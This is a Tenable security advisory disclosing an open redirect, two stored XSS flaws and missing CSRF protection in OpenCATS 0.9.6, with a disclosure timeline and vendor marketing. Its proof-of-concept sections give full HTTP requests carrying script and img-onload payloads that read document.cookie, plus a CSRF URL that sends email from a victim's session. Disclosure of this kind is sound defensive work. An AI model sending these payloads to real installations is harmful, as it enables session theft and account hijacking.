Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Multiple Vulnerabilities in OpenCATS 0.9.6

High

Synopsis

Open Redirect

AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N 7.3/6.9

CWE: 601

OpenCATS is vulnerable to a template injection vulnerability which is caused by improper validation of user-supplied GET parameters.

The request/response shown below is an example of what the victim would be served. We can see that the user is directed away from their intended site to a potentially malicious one ‘https://tenable.com/’.

This vulnerability is found in SettingsUI.php where the ‘url’ GET parameter is passed as the value to the HTML frame source in the template.

Since this value is not sanitized we can also pass Javascript that will be executed when the page renders.

Proof of concept

To reproduce this issue, send the below request to the target.

GET /index.php?m=settings&a=previewPage&url=https://tenable.com HTTP/2
Host: <your address>
Cookie: CATS=<your CATS session token here>
 

You will then see that you are redirected to the tenable.com domain.

Unauthenticated Stored XSS

AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 8.3/7.9

CWE:79

It was noted during testing that the target is vulnerable to stored cross site scripting due to insufficient sanitization of questionnaire answers in the candidate application form.

An unauthenticated attacker could exploit this issue by submitting malicious Javascript as the answer to a questionnaire which would then be executed when an authenticated user reviews the candidate's submission. This could be used to steal other users’ cookies and force users to make actions without their knowledge.

Proof of concept

To reproduce this issue, send the below request to the OpenCATS target. Note: you will need to change the target IP address in the host header to that of your own target.

POST /careers/index.php?m=careers&p=onApplyToJobOrder&questionnairePostBack=1 HTTP/2
Host: <OpenCATS address>
Content-Length: 2070
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydgDyvVK05zEW6FFY
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://<OpenCATS Address>/careers/index.php?m=careers&p=onApplyToJobOrder
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="ID"

1
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="candidateID"

-1
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="applyToJobSubAction"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="file"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="resumeContents"

test

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="firstName"

Gimli
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="lastName"

Gimli
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="emailconfirm"

[email protected]
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phoneHome"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phoneCell"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="phone"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="bestTimeToCall"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="address"
 

------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="city"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="state"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="zip"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="keySkills"

test
------WebKitFormBoundarydgDyvVK05zEW6FFY
Content-Disposition: form-data; name="questionnaire1Question1"

<script>alert(document.cookie)</script>

-----WebKitFormBoundarydgDyvVK05zEW6FFY-
 

You can see that when browsed to, the application executes our Javascript in the user’s browser.

Authenticated Stored XSS

AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:L 6.4/6.1

CWE: 79

It was noted during testing that the target is vulnerable to stored cross site scripting due to insufficient sanitization of the description when creating a calendar event.

An authenticated attacker with access to a restricted account could exploit this issue by submitting malicious Javascript as the description for a calendar event, which would then be executed in other users' browsers if they browse to that event. This could result in stealing session tokens from users with higher permission levels or forcing users to make actions without their knowledge.

==========================

Proof of concept

To reproduce this issue, send the below request to the OpenCATS target. Note: you will need to add your own CATS session token and change the target IP address in the host header to that of your own target.

POST /index.php?m=calendar&view=MONTHVIEW&month=11&year=2022&week=-1&day=-1&a=addEvent HTTP/2
Host: <OpenCATS address>
Cookie: CATS=<Your CATS session token>
Content-Length: 278
Origin: https://<OpenCATS Address>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36

postback=postback&title=test&type=600&publicEntry=on&dateAdd=11-22-22&allDay=1&sendEmail=admin%40testdomain.com&reminderTime=15&description=%3Cimg+src%3D%22https%3A%2F%2F<OpenCATS Address>%2Fimages%2FapplicationLogo.jpg%22+onload%3D%22alert%28document.cookie%29%22%3E&submit=Add+Event|

When a user browses to the calendar event, the application executes our Javascript in the user's browser.

Cross-site request forgery

AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

CWE: 352

There is no CSRF protection for this application; we can see in the POST request below that there is no CSRF token being used.

An attacker could exploit this issue by creating a dummy page that would execute Javascript in an authenticated user's session if they were tricked into using the malicious dummy page. However, some actions in this application are made with GET parameters which means an attacker would only need to trick an authenticated user into browsing to a specific URL.

Proof of concept

If an authenticated user browses to the below URL they will send an email to a specified address. Note that the fromAddress parameter has to use the domain of the OpenCATS installation, but the username can be anything you like.

https://<opencats address>/ajax.php?f=testEmailSettings&testEmailAddress=<target email address>&fromAddress=<your from address>

Disclosure Timeline

November 24th, 2022: Tenable notifies vendor
November 29th, 2022: Tenable sends second notification to vendor
December 6, 2022: Vendor acknowledges, requests further information
January 16, 2023: Additional information provided to vendor
February 27, 2023: Disclosure deadline expired, publishing TRA

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2023-8
Credit:
Derrie Sutton
CVSSv3 Base / Temporal Score:
8.3/7.9
CVSSv3 Vector:
AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L 
Affected Products:
OpenCATS version 0.9.6
Risk Factor:
High

Advisory Timeline

February 27, 2023: Advisory Published
March 1, 2023: CVSS vector for open redirect updated

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Formerly Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Formerly Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training